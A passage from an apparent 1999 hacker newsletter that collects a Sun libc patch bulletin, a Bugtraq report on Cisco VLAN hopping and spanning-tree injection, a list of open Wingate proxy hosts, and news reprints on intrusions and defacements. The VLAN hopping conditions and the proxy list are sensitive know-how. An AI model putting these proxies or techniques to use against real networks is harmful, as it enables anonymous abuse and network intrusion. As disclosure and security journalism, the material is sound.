5.6, 5.6_x86. Not vulnerable: All other supported versions of SunOS. 3. Understanding the Vulnerability In libc, the LC_MESSAGES environment variable affects the behavior of messaging functions. A vulnerability exists where a buffer overflow could be exploited to gain root access. The patches listed in this bulletin address both libc and the ufsrestore and rcp binaries which are statically linked against libc. 4. List of Patches The following patches are available in relation to the above problem. SunOS version Patch ID _____________ _________ 5.7 106541-07 5.7 ufsrestore 106793-03 5.7 rcp 107972-01 5.7_x86 106542-07 5.7_x86 ufsrestore 106794-03 5.7_x86 rcp 107973-01 5.6 105210-24 5.6 ufsrestore 105722-03 5.6 rcp 107991-01 5.6_x86 105211-22 5.6_x86 ufsrestore 105723-03 5.6_x86 rcp 107992-01 _______________________________________________________________________________ APPENDICES A. Patches listed in this bulletin are available to all Sun customers at: http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches B. Checksums for the patches listed in this bulletin are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS C. Sun security bulletins are available at: http://sunsolve.sun.com/pub-cgi/secBulletin.pl D. Sun Security Coordination Team's PGP key is available at: http://sunsolve.sun.com/pgpkey.txt E. To report or inquire about a security problem with Sun software, contact one or more of the following: - Your local Sun Solution Center - Your representative computer security response team, such as CERT - Sun Security Coordination Team. Send email to: security-alert@sun.com F. To receive information or subscribe to our CWS (Customer Warning System) mailing list, send email to: security-alert@sun.com with a subject line (not body) containing one of the following commands: Command Information Returned/Action Taken _______ _________________________________ help An explanation of how to get information key Sun Security Coordination Team's PGP key list A list of current security topics query [topic] The email is treated as an inquiry and is forwarded to the Security Coordination Team report [topic] The email is treated as a security report and is forwarded to the Security Coordination Team. Please encrypt sensitive mail using Sun Security Coordination Team's PGP key send topic A short status summary or bulletin. For example, to retrieve a Security Bulletin #00138, supply the following in the subject line (not body): send #138 subscribe Sender is added to our mailing list. To subscribe, supply the following in the subject line (not body): subscribe cws your-email-address Note that your-email-address should be substituted by your email address. unsubscribe Sender is removed from the CWS mailing list. ________________________________________________________________________________ Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBN9ajGLdzzzOFBFjJAQH6UAP/TeqiirvcgwPXeDGhVZ+zhbtllptxwCto g9h++H1M8UN0WC5170OGNlGWTHqxVD3JwlIGwlev6ydvnDJCJg4ADXNnX7bW00rs B3lPPl/s82iTeUPV5CGN9S0ZNIb0H9IlsN8v/dZCLGv9+3SryF1WO3kPAeOJIzsJ C+AYwQ7ykEo= =k8ch -----END PGP SIGNATURE----- @HWA 70.0 VLAN Security holes in cisco catalyst ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re: VLAN Security To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, You're right this is definitively a problem. However I don't think it is related to the 802.1Q specification. Any non-trunk port should discard 802.1Q frames because non-trunk ports are just regular ethernet ports. We have a 2924M here, I'll test that and alarm the whole company (boy, do I love this list :-) ). FYI, something else you might want to try. The 802.1Q spec does not have provisions for one instance of spanning tree per vlan (as opposed to ISL). It means anyone can inject BPDUs into your network and generate topology changes (or even claim to the be root switch). Since most people use the STP defaults, the perpetrator only needs to send one BPDU every 30 seconds to make sure that the connectivity to be disrupted remains disrupted. The important part of this is: with 802.1Q (one spanning for all vlans), you can adversely affect any vlan, REGARDLESS of the vlan you're a member of. Cisco has fixed this by extending the spanning tree spec. They now have something called Per Vlan Spanning Tree+. Check with Cisco for specific version numbers. Oh! And try SA6 on the 2924M-XL, it allows you to have a management vlan other than vlan 1. Since vlan 1 cannot be removed from trunks, someone could easily take control of your whole network of switches if he/she could get his/her hands on vlan 1. Yves Lepage Consultant - Broadband Technology Bell Nexxia > -----Original Message----- > From: Bugtraq List [mailto:BUGTRAQ@SECURITYFOCUS.COM]On Behalf Of > bugtraq > Sent: Wednesday, September 01, 1999 4:45 AM > To: BUGTRAQ > Subject: VLAN Security > > > To Bugtraq, > > We have recently conducted some testing into the security of the > implementation of VLANs on a pair of Cisco Catalyst 2900 series > switches and we feel that the results of this testing might be of > some value to the readers. Testing basically involved injecting > 802.1q frames with forged VLAN identifiers into the switch in an > attempt to get the frame to jump VLANs. A brief background is > included below for those that might not be too familiar with VLANs. > Others should skip to the end for the results. > > Background > ========== > Virtual LAN (VLAN) technology is used to create logically separate > LANs on the same physical switch. Each port of the switch is > assigned to a VLAN. In the case of the Cisco Catalyst, VLAN'ing is > done at layer 2 of the OSI network model, which means that a layer > 3 device (router) is required to get traffic between VLANs > (possibly a filtering device). > > In addition to the above, VLANs may be extended beyond a single > switch through the use of trunking between the switches. The trunk > allows VLANs to exist on multiple switches. To preserve VLAN > information across the trunk, the ethernet frame is 'wrapped' in a > trunking protocol. Cisco have their own proprietary trunking > protocol, but they also support the emerging 802.1q standard - we > used 802.1q trunking in these tests. > > Basically, 802.1q adds a tag to the ethernet frame that specifies > the VLAN that the frame belongs to. Thus, when it is transported > between switches over the trunk, it is possible for the receiving > switch to send the frame to the correct VLAN. In Cisco's > implementation of 802.1q the tag is four bytes long and has the > format "0x 80 00 0n nn" where nnn is the VLAN identifier. The tag > is inserted into the ethernet frame immediately after the source > MAC address. So, an ethernet frame entering switch 1 on a port > that belongs to VLAN 4 has the tag "80 00 00 04" inserted. The > 802.1q frame traverses the switch trunk and the tag is stripped > from the frame before the frame leaves the destination switch port. > > > For more information on 802.1q - > http://grouper.ieee.org/groups/802/1/vlan.html > > During our tests we used the packet generation tool of Network > Associates' Sniffer Pro v 2 to generate 802.1q frames with modified > VLAN identifiers in an attempt to get frames to hops VLANs without > the intervention of a layer 3 device. > > Findings > ======== > We found that under specific conditions it was possible to inject > frames into one VLAN and have them 'hop' to a different VLAN. This > is a serious concern if the VLAN mechanism is being used to > maintain a security gradient between two network segments. This > has been discussed with Cisco and we believe that it is an issue > with the 802.1q specification rather than an implementation issue. > > The trunk port, along with all the other ports, must be assigned to > a VLAN. If some non-trunk ports on the switch share the same VLAN > as the trunk port, then it is possible to inject modified 802.1q > frames into these non-trunk ports, and have the frames hop to other > VLANs on another switch. > > eg. > Switch 1 has ports 1-12 on VLAN 1 > Switch 1 has ports 13-23 on VLAN 2 > Switch 1 has port 24 configured as an 802.1q trunk (VLAN 1) > Switch 2 has ports 1-12 on VLAN 1 > Switch 2 has ports 13-23 on VLAN 2 > Switch 2 has port 24 configured as an 802.1q trunk (VLAN 1) > Machine 1 is on port 1, switch 1. > Machine 2 is on port 13, switch 2. > > We can send 802.1q frames with the following details... > Source MAC = Machine 1 > Destination MAC = Machine 2 > VLAN ID = VLAN 2 > ...from machine 1 and they will arrive at machine 2. > > This will only occur if the trunk port belongs to the same VLAN as > machine 1. > * We tried this only for the trunk belonging to VLAN 1. We expect > that similar results would be achieve if machine 1 and the trunk > port shared VLAN 3, 4, ... > > Implications > ============ > This is a problem if the following conditions are met: > 1. The attacker has access to a switch port on the same VLAN as > the trunk. 2. The target machine is on a different switch. 3. > The attacker knows the MAC address of the target machine. > > In a real-life scenario, there may also be a requirement for some > layer 3 device to provide a connection from VLAN 2 back to VLAN 1. > > Recommendations > =============== > Try not to use VLANs as a mechanism for enforcing security policy. > They are great for segmenting networks, reducing broadcasts and > collisions and so forth, but not as a security tool. > > If you MUST use them in a security context, ensure that the > trunking ports have a unique native VLAN number. > > Final Notes > =========== > Thanks to those at Cisco who assisted in the handling of this > issue. The two switches used for testing were WS-C2924M-XL's. They > were both running 11.2(8)SA5. Additional information on test > configuration will be made available on request. > > Regards, > > Dave Taylor (david.taylor@alphawest.com.au) > Steve Schupp (steve.schupp@alphawest.com.au) -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com> iQA/AwUBN9Z1xqktD0ID/HtTEQI52QCg+ArG1J8hm63aqNUXIRao85JeBkQAnifY KuP+Gs9wT0IWF4wVhpyKR+lx =z1sQ -----END PGP SIGNATURE----- @HWA 71.0 Wingates list ~~~~~~~~~~~~~ I'm not responsible for anything you do with this list, they are presented here so that the offending machines can fix their configurations so that they may not be abused (irc etc). http://djice.freehosting.net/wingates.txt 208.45.226.110:1080 209.146.27.5:1080 adsl-216-103-210-236.dsl.snfc21.pacbell.net:1080 ns.elaso.cz:1080 mpa2.access.ch:1080 ip-207-60.dsl.dancris.com:1080 212.29.218.132:1080 btstts02c60.nbnet.nb.ca:1080 194.186.36.129:1080 ip240.fredericksburg3.va.pub-ip.psi.net:1080 @HWA 72.0 US Army Uses BO2K ~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond U.S. Army special agents from the Army Criminal Investigation Command have 'proved' that NetBus and Back Orifice can be used to hijack desktop camera and microphone applications for the purposes of industrial espionage, spying or to gather evidence for a criminal investigation. The commandeered cameras and microphones can then secretly send data to a monitoring station unbeknownst to the end user. PC World http://www.pcworld.com/pcwtoday/article/0,1510,12891,00.html (See section 33.0 Your Pc Could be Tapped) @HWA 73.0 India And Pakistan Duke It Out In Cyberspace ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne While more than 1000 soldiers from both India and Pakistan died fighting in an undeclared war in the mountains of Kashmir, the two countries were slugging it out in cyber space too. Indian and Pakistani computer professionals in the United States and Europe helped their home countries by handing out information on how to cripple the enemy's computer systems. An interview with an Indian Army Major would not confirm that the attacks on computer systems where sponsored by the Pakistani government, and went on to say that India would not resort to such childish acts as cyber terrorism. FairFax IT http://www.it.fairfax.com.au/communications/19990921/A12383-1999Sep20.html Sub-continent in Web war By D. J. VARMA Tuesday 21 September 1999 ANOTHER bloody chapter was written in history of the sub-continent earlier in the year, when more than 1000 soldiers from Pakistan and India died fighting an undeclared war in the mountains of Kashmir. Finally, after a meeting between President Clinton and Pakistani Prime Minister Nawaz Sharif in Washington in July, all troops were withdrawn. At the same time they have been fighting a war over information, with several Internet resources hacked in both countries. With some of the best software skills in the world, the fighting over the Internet is just as ferocious as in the snow-capped mountains of Kashmir. Several top Indian and Pakistani computer professionals in America and Europe are "helping" their respective governments by supplying information on the best way to harm the enemy's computer systems. In October last year, anyone logging on to the Indian army website www.armyinkashmir.org found themselves viewing the contents of a Pakistani Government website which gave an anti-Indian slant on the Kashmir issue. The Indian Government traced this hacking to a Pakistan-based information services firm. The hackers, using the handles of Gharib Hanif and Munda Pakistani, successfully managed to divert all logins to the Indian site to their own in Pakistan for two days. More recently, while battles raged in the mountains in Kashmir in May, there was another attack on www.armyinkashmir.org. With about 200 e-mails of support and financial help being received daily by the Indian Government at this Web address, the mail component of the website was tampered with. All pro-Indian e-mail was diverted to a different address. The Indian armed forces, using some of the best computer professionals in the country, quickly recovered from the hack attack. The Indian Government, in turn, cut off all network access on 25June this year to the website of the respected Pakistan newspaper Dawn at www.dawn.com. Nobody from India could get access to the Dawn website for more than a fortnight. Several Indian national newspapers campaigned for the restoration of Internet access to Dawn, a newspaper seen as a powerful voice for democracy and moderation in Pakistan. In the past year, most of the government sites in these two countries, including the Bhabha Atomic Research Centre where India's atomic technology was developed, have been attacked. The Indian army's webmaster, Major Vivek Bhatnagar, at only 35, is typical of the new breed of leading-edge Indian computer professionals serving in the armed forces. He had five years of physical training at the National Defence Academy while he completed his BSc and B Tech, and later topped the Advanced Computing course. After a stint with Military Intelligence, he has taken charge of the army's Internet cell. In an interview for The Age he spoke about his team's role in defending Indian military installations from the hackers. Major Bhatnagar politely declined to answer questions about more sensitive issues such as whether the Pakistani intelligence agencies were behind the attacks on Indian computer systems. Bhatnagar said www.armyinkash- mir.org was the first propaganda site managed by the Indian Armed Forces to counter a Pakistani disinformation campaign. "We were relatively new to the concept and that was perhaps the reason why the whole thing happened," he said. "The site was not broken into or hacked as such. What had actually happened was that somebody had got the URL www.armyinkashmir.org lead to some other site which was an anti-Indian site. This was corrected within two days and the original site was restored." Bhatnagar said the Indian Government was aware of Pakistan groups behind the attacks but would not go into details. However, he said more than 100 were financed or set up by the Pakistan Government. The three official websites of the Indian Army are www.armyinkashmir.org, armedforces.nic.in and www.vijayinkargil.org/www.vijayinkargil.com. Bhatnagar said the Indian Government would not retaliate against hackers. "We do not believe in hacking. Hacking is typically an immature, irresponsible and illegal act. The Indian Armed Forces do not resort to cheap gimmicks." He confirmed that several Indian computing professionals abroad had offered help. "Thousands of offers came from all over the world. But mostly they were from the US," he said. "When the site was launched, we had tons of e-mails offering all kinds of help. Offers ranged from adopting a martyr's family to educating the children, to hosting websites, to hacking Pakistani propaganda sites to something as diverse as a doctor from the US offering to come and cook for the soldiers. "The response of the Indian community worldwide was tremendous and touching." He acknowledged that the conflict was a good example of a cyber-war, in terms of information access. "While the world did have access to print and electronic media, it was greatly restricted. The cybermedia for the first time was available with authentic and near real time information. A great majority of people were thus relying upon this media for daily updates." Meanwhile, the publisher and chief executive of a news group in Pakistan found the Internet edition of Dawn the target of attack from India. Hameed Haroon, 46, has masters degrees from Harvard and Boston Universities. He also holds a BSc (Hons) from the prestigious London School of Economics. His reputation as a leading intellectual of the sub-continent was further enhanced by his deft handling of the Indian Government's attempts to cut off internet access to Dawn during the conflict. During the Kargil conflict earlier this year, he believes Dawn was the only website that was targeted. "We started receiving complaints from our Indian readers around 25June that they could not access our website. We requested several of them to do a `trace route', a program that traces the Internet path between the computer asking for a web page and the computer that has the subject page. "About 15 people replied from different cities in India. All except one said that they could not access Dawn's site. And all except one subscribed to VSNL- Videsh Sanchar Nigam Ltd, virtually India's only Internet Service Provider. "Four of them also sent us the results of trace routes they had done. These clearly showed that VSNL's backbone servers at their gateway in Mumbai (Bombay) were blocking access to Dawn's web site." Haroon said he could not pinpoint whether a particular story prompted the action. "Dawn has earned its reputation as one of the most respected newspapers in South Asia because of its balanced response to the crises that periodically affect this volatile region. That's why we have an influential, albeit small readership in India - a readership of policy makers, think tanks, diplomats, journalists and academics - those who read our newspaper to get an insight into the perceptions of the more moderate and influential elements of Pakistani public opinion. "Failure to understand these perceptions can only worsen current misunderstandings between both nations." Haroon said there was no forewarning of the impending blocking. "When it happened we were convinced that it was the work of an over-zealous sys-op at VSNL, rather than something officially sanctioned." Access to the site was restored to Indian readers on 13July. "I'd like to clarify that access to our website was only blocked to users in India, and everybody else in the world could still visit our site. Our site was always fully functional." He said that Dawn was a regular target of hackers. "There are attacks of varying severity almost on a daily basis. There have also been a number of attempts made to hijack our domain name. While I cannot go into the details of our security measures, we're comfortable in the knowledge that in the three years our site has been operational, not a single hacking attempt has been even remotely successful." The problems and surrounding publicity have lifted traffic to the site. "We've seen a 15 per cent to 20 per cent increase in visits from India since the blockage was removed," Haroon said. "Worldwide, we saw our readership increase by some 20 per cent during the period of the Kargil conflict. Our experience is that when you attract a larger number of people than usual because of some crisis, you tend to retain a substantial fraction of them after the crisis." He said Dawn greatly appreciated the united stand taken by the mainstream Indian press in their support. In particular the Times of India, the Indian Express, Rediff.com and the Asian Age, which all strongly opposed the ban. "The Asian Age continued to print Dawn's material as before using their London office to access our site and download the material. Had our roles been reversed, we would have taken an equally supportive stand." Additional reporting from India done by Vikram Varma @HWA 74.0 Czech Bank Threatened by Cyber Terrorists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by mo0ne The largest Czech savings bank, Ceska Sporitelna, may have had large amounts of its data stolen. Local police investigating the situation have not yet made any arrests. Customer names, addresses and complete list of transactions for more than 2.5 million clients are supposedly no longer in the banks hands. It is unclear from this article what the thief of this information wants. Internet News http://www.internetnews.com/intl-news/print/0,1089,6_204701,00.html International News Unknown Hacker Offers Czech Savings Bank Data via Net September 21, 1999 Petr Koubsky, Czech Correspondent International News Archives [Prague, CZECH REPUBLIC] Czech police are investigating the case of a hacker who is offering Internet access to the complete database of client transactions data of the largest Czech savings bank Ceska sporitelna. Although the manhunt began September 13, the police have yet to locate the offender. Certain Czech companies from various industries obtained the anonymous offer. Its author claims to have vital data -- among others name, address and complete list of transactions for any given period -- about the more than 2.5 million of clients of Ceska sporitelna. Details from the accounts of several randomly selected clients were enclosed as the evidence, and the sample information was confirmed by the clients themselves. The anonymous hacker also published his e-mail address, sporoziro@yahoo.com, that he offers for communication with media as well as for "business offers." Ceska sporitelna conceded that privacy of its clients is in serious threat, but denied that deposits could by in any danger. However, the reputation of the bank was damaged. Some sources close to the police say that the attack might primarily be assigned to hurt the bank and lower its market capitalization; Ceska sporitelna is currently in the final phase of privatization. Police also assumes the offender may be an insider at the bank. This theory is backed by representatives of the IT companies that supplied Ceska sporitelna with its database system, among them Microsoft and IBM. Some in the Internet industry fear that the case might be used by politicians as argument for enforcing the more restrictive Internet access laws. In the present, Czech Internet laws are quite liberal, but are often vaguely stated. Copyright 1999 internet.com Corp. All Rights Reserved. Legal Notices, Reprints. @HWA 75.0 'Post Mortem' of Nasdaq Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by no0ne London-based mi2g software has claimed to have done a 'post mortem' of the defacement of the NASDAQ web site, perpetrated last week by the United Loan Gunmen. mi2g is claiming that unpatched vulnerabilities in Microsoft's Internet Information Server were exploited. (And how do they know this? Are they sure it was IIS and not NT? Did NASDAQ hire these people to analyze the logs? Or are they just making stuff up?) The UK Register http://www.theregister.co.uk/990920-000012.html mi2g Software http://www.mi2g.co.uk/ UK Register; Posted 20/09/99 12:38pm by Tim Richardson Nasdaq hacked through MS security hole Flaws in Microsoft's Internet Information Servers have been blamed for the hack attack on the Nasdaq and American Stock Exchange Web site last week. The weaknesses allowed hackers to breach security and trash one of the most high profile Web sites in the US. The allegation was made by London-based mi2g software which carried out a post mortem of the hack attack. "Initial analysis suggests that well publicised vulnerabilities in Microsoft's Internet Information Server have been exploited," said the report. "Whilst Microsoft has been regularly issuing software patches for holes found, there is no guarantee that all patches may have been applied by the network administrators," it said. The attack -- which left graffiti all over the walls of the financial Web site -- was allegedly carried out by the hacker group "United Loan Gunmen" (ULG). The most sensitive aspect of the attack is a claim by the ULG that it set up an email account on Nasdaq's computers. If this proves to be true, it would mean that ULG obtained "deep access" to the Nasdaq computer system severely compromising the security of the site. "On-line financial institutions, bourses and shopping sites ought to be aware that they need to put Internet security at the top of the board agenda," warned DK Matai, MD of mi2g software. Despite being contacted on Friday to discuss the matter, no one from Microsoft was available for comment by press time. � @HWA 76.0 DoD Creates Y2K-Alert Levels In case of Sneak Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Michelle The Department of Defense has created various Y2K-alert levels as part of its contingency plan to deal with a potential sneak attack as a result of Y2K related computer failures. The levels cover everything from widespread systems failures to "opportunistic engagements" by an opposing nation-state. Yahoo News http://dailynews.yahoo.com/h/nm/19990922/ts/yk_usa_2.html Wednesday September 22 12:24 AM ET Pentagon Planners Mull Y2K Sneak Attack By Jim Wolf WASHINGTON (Reuters) - The Year 2000 computer glitch could open the door to a sneak attack on the United States, especially if many automated systems crash, the Defense Department said in a contingency-planning memo obtained Tuesday. To deal with such a threat, the Pentagon is working out worldwide staffing and emergency procedures to cope with vulnerabilities that could be caused by computer mix-ups, according to the memo from the Joint Chiefs of Staff dated Sept. 10. The document, sent to U.S. commanders worldwide, spelled out five alert levels to streamline the Defense Department's response. The highest, ``Y2K Posture Level One,'' would reply to ''widespread'' systems failures sparked by the century date change. It assumes that civilian authorities would seek military help to cope with disruptions. In such a case, ``deliberate information operations attacks and opportunistic engagements by hostile forces are possible,'' it said. ``Information operations attacks'' refers to computer-based efforts to knock out critical electronic infrastructure such as financial networks or military data banks. ``Opportunistic engagements'' means surprise attacks timed to cash in on any Y2K-related confusion in the United States, the world's most technologically dependent nation. Under such a Y2K-alert level, ``strict'' caps on communications throughout the Defense Department might be imposed, presumably for fear of playing into the hands of a foe seeking to take advantage of Y2K-related disruptions, the document said. The memo from the Joint Chiefs assigned the five unified regional war-fighting commands and military services the task of preparing troops, equipment and technical support personnel for five graduated Y2K-related potential threat levels. The military would adjust its year-end and early January operations on the basis of those Y2K ``vulnerability'' assessments, the document said. It said the alert level would be declared, as normal, by Defense Secretary William Cohen. If a threshold of perceived vulnerability is crossed because of systems failures, Cohen ``will declare a Y2K posture level and the department will respond by adjusting readiness postures accordingly.'' ``Recognizing the uniqueness of each Department of Defense organization, you should develop, promulgate and implement the corresponding Y2K readiness postures that best prepare your organization to cope with most probable Y2K consequences,'' the memo told commanders, service chiefs and Pentagon agency heads. Such preparations were a normal part of military contingency planning not unlike the five levels of readiness for a hurricane, said a spokesman for the Joint Chiefs of Staff, Navy Lt. Cmdr. Jim Brooks. ``Preparing for Y2K is much like we would do for any potential threat out there,'' he said. Many military units have been conducting ``tabletop'' exercises to get ready for the Y2K glitch, which may scramble systems that have not been reprogrammed to recognize the century date change in 101 days. Such drills, partly to determine where to base equipment such as electric generators and emergency medical supplies, ''have already taken place and they are taking place,'' Brooks said. John Hamre, the deputy defense secretary in charge of Y2K at the Pentagon, is ``particularly interested in your assessment of the need to preposition'' personnel and equipment to cope with any Y2K problems, the memo said. @HWA 77.0 Another Java Hole in Hotmail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid Another Java related hole in Hotmail allows a malicious user to steal Hotmail passwords. C|Net http://news.cnet.com/news/0-1005-200-122099.html Hotmail bug allows password theft By Erich Luening Staff Writer, CNET News.com September 22, 1999, 12:45 p.m. PT Microsoft can't seem to shake the security gremlins from its Hotmail free email service. The software giant is investigating yet another security dilemma with its Hotmail service that permits the sending of JavaScript code that could automatically present a bogus password entry screen. Usernames and passwords entered by unsuspecting users could be collected by the email sender. Microsoft said it is looking into the issue, although it has not received any other reports on this security problem. JavaScript is a Web scripting language developed by Netscape Communications for performing actions on Web pages without user input. The language is commonly used for launching pop-up windows or for scrolling text, but it has also become a major security headache for browser makers and Web sites like Hotmail because of its potential usefulness to malicious hackers. Earlier this month, Microsoft confirmed a JavaScript password-stealing exploit that had the same effect as the most recent one, but that was implemented differently, according to Georgi Guninski, a Bulgarian programmer. Guninski claims the new JavaScript glitch circumvents Hotmail security barriers by placing the JavaScript in HTML image files. Microsoft confirmed that the glitch is yet another way to execute malicious code in someone's email. "We do filter out some JavaScript tags to provide better security, to stop some hacks and spoofs," said MSN lead product manager Deanna Sanford. "As we get these reports, we are evaluating other filters to provide to users. It's an ongoing process." As an extreme measure to protect against such security breaches, both Guninski and Sanford said users can disable JavaScript in their browsers. After a security problem last week exposed Hotmail users to attack, Microsoft acknowledged it was hiring an outside firm to examine security at the free email service. @HWA 78.0 Microsoft Launches New Piracy Initiative ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Pir8 Microsoft is going after online pirates in a big way. The company has recently filed legal action against three US-based electronic businesses. The companies operated only through SPAM and delivered pirated copies of Microsoft products to consumers. Wired http://www.wired.com/news/news/business/story/21885.html Microsoft Gunning for E-Pirates Wired News Report 12:45 p.m. 22.Sep.99.PDT Microsoft is putting the full-court press on Net sites selling counterfeit copies of its software. The company filed legal action against three US-based businesses, citing the electronic stores for consumer deception and distribution of counterfeit software. The culprit: the oh-so-easy Internet. "The Internet as a powerful tool of e-commerce is also being used by counterfeiters as an effective mechanism for targeting consumers," said Microsoft corporate attorney Tim Cranton. There's nothing new about a crackdown on software piracy, but Microsoft said this piracy operation was unique in the way that it exploited the Web and email for its purposes. According to Microsoft, a network of counterfeiters, working independently from home, combined to wreak unprecedented havoc. "The difference really is the spamming," Cranton said. "What we have is counterfeit distribution that is being effected through unsolicited email being sent to consumers around the world." Email was the only source for orders taken by the pirates, Cranton said, adding that this is a new tactic in the area of piracy. "The consumer doesn't need to leave their house to go to a business," he said. "It just comes right into your living room." The defendants named in the suit took orders and arranged shipment from their homes without maintaining any inventory, Microsoft said. The Net also protected their anonymity; the defendants conducted fairly elaborate schemes to hide the origins of their email. Millions of consumers were targeted by the messages, amd thousands bought software in only a few months. In less than six months, a Microsoft piracy hotline received more than 2,000 calls from victimized or suspicious consumers. The callers typically ordered the software only to discover that either it didn't work or the package was incomplete. The spam targeted individuals, companies, law firms, and government agencies around the world, Microsoft said. Microsoft hired professional investigators who made their way to the pirates by tracking down the source of the email. The case is indicative of a larger trend, Cranton said. "We're seeing a huge increase in the prevalence of counterfeit software over the Internet ... whether through Web sites or auction sites, or through downloading sites." Counterfeit software is very professionally packaged and sold in places where they least expect it, and consumers need to be careful, Microsoft cautioned. The effort to stem counterfeit sales came one day after the United States said it might appeal a World Trade Organization finding that a US export tax structure is protectionist and violates international agreements. The European Union argued that the US plan amounted to an export subsidy for American firms, with Boeing and Microsoft among the chief beneficiaries. "This US export subsidy has created an important distortion of international trade by granting an unfair advantage to US products in third markets," said Pascal Lamy, the EU's trade chief. "[It] has expanded over the last decade to more sectors, including computer software and agricultural products." A spokesman for the US mission to the EU in Brussels had no comment. The United States maintains that its tax structure is consistent with WTO rules. @HWA 79.0 Online Investors at Serious Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by st0len A demonstration at the Smart Card Forum's annual conference Digital Bond revealed how online investors are at serious risks from simple attacks. The methods demonstrated involved spoofing DNS entries to fool people into entering their username/passwords on fake sites. Digital Bond http://www.digitalbond.com/ Yahoo News http://biz.yahoo.com/bw/990922/fl_digital_1.html Wednesday September 22, 7:45 am Eastern Time Company Press Release Digital Bond Demonstrates Online Investors at Risk From Simple Criminal Attack Digibond(TM) Security Protects the Integrity of Internet Transactions WASHINGTON--(BUSINESS WIRE)--Sept. 22, 1999-- Digital Bond(TM) revealed today how virtually every investor that trades over the Internet is at risk from a simple hacker attack. A live demonstration at the Smart Card Forum's annual conference showed how criminals could gather UserID / Password pairs to have access to investors' accounts. A criminal would use the investors' money to manipulate a stock price and would make money in the criminal's legitimate account. The attack involves a simple change in a Domain Name Service (DNS) file. DNS systems are distributed throughout the Internet, so a hacker would only need to exploit a single ISP or corporate system. Any investors that use this DNS would be sent to hacker sites that looked identical to brokerage sites. After the hacker collected the UserID / Password pair they would send the investor to the real brokerage site, and the investor would not know they had been compromised. Additional technical information is available at www.digitalbond.com. This attack highlights the need for a transaction based security protocol to replace the current session based encryption protocol (SSL). Transaction based security provides: -- Identity authentication of investor and brokerages -- Transaction authentication for every order and receipt -- Non-repudiation for every order and receipt -- Unambiguous and secure dispute resolution procedures The SSL encryption protocol used today by virtually every brokerage provides no transaction security. Plans to add investor and broker certificates in the future may help provide identity authentication, but will not offer any transaction authentication, non-repudiation, or dispute resolution assistance. Dale Peterson, President of Digital Bond, said: ``Virtually every other transaction, whether it be credit cards at a restaurant, ATM withdrawals, or wire transfers, has strong transaction security. Surely the money involved in trading stocks over the Internet requires this same level of security. Our new Digibond secure transaction system digitally signs every order and every receipt. Both the investor and brokerage can be assured of the integrity of every transaction message.'' For even greater security the investor system is available with a Certicom SC-400 elliptic curve smart card. The smart card, which is a credit card with an embedded digital signature chip, digitally signs all orders and is used to verify all receipts. It is as easy to use as an ATM card. The investor inserts the smart card in a reader, and a window to enter their password pops up on the screen. Without both the smart card and password, the investor can not trade on their account. The rest of the process is automated and requires no additional steps than those needed to trade online today. The Digibond systems solves a major problem for investors: dispute resolution. Today it is difficult for an investor to prove their claim in a dispute. With the Digibond system, a digitally signed receipt from the brokerage is irrefutable proof of the transaction. In fact, the Digibond investor system has a dispute button the investor can click on to send the signed receipt to the brokerage for automated dispute resolution. Brokerages and other merchants can easily integrate the Digibond system into their network. Existing web server applications simply use Digibond functions for signing, verifying signatures, and dispute resolution. Most importantly the Digibond system architecture was created to handle the most optimistic estimates for transaction volume for the next five years. It is a scalable, high performance system. The Digibond system will secure any two-party transaction. Mr. Peterson said, ``We are initially focused on the Internet brokerage industry, but this solution can secure Internet prescription services, Internet credit cards, Internet casinos, and other Internet transaction businesses.'' Pilot projects will be announced in October and initial deployment will start at the beginning of the year 2000, after the Y2K lockdowns are over. About Digital Bond Digital Bond was founded by a team of security experts with decades of experience protecting financial transactions. Digital Bond develops leading systems and services that protect the integrity of Internet transactions. For more information, visit Digital Bond's web site at http://www.digitalbond.com . About Certicom Certicom is a leading provider of next-generation encryption technology used to build strong, fast, and efficient security solutions. Major computing and communications companies, such as 3Com/Palm Computing, BellSouth Wireless Data, Hewlett-Packard, Motorola, Pitney Bowes and VeriFone, incorporate Certicom's technology into electronic commerce software, wireless messaging applications, and smart cards. Certicom shares are traded on the Toronto Stock Exchange under the symbol ``CIC.'' For More Information Contact: Digital Bond, Inc. Attn: Dale Peterson 6289 W. Sunrise Blvd., Suite 204 Sunrise, FL 33313 Tel: 954-797-9445 FAX: 954-797-9447 peterson@digitalbond.com www.digitalbond.com Contact: Digital Bond, Inc., Sunrise, Fla. Dale Peterson, 954/797-9445 -=- @HWA 80.0 Leapfrog 1.0 Released Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by forensic COTSE today released Leapfrog 1.0, a utility which anonymizes and redirects any port. It can be used to work around firewall configuration and other issues requiring a port redirect. Leapfrog will take any incoming connections and automatically send them to any other machine, any other port. COTSE http://www.cotse.com/leapfrog.htm Leapfrog 1.0 Leapfrog will anonymize and redirect any port. It can be used to work around firewall configuration and other issues requiring a port redirect. For example, you have a firewall that does not allow telnet (23), but it does allow http (80). Set leapfrog up on the other side of the firewall to listen on port 80 and 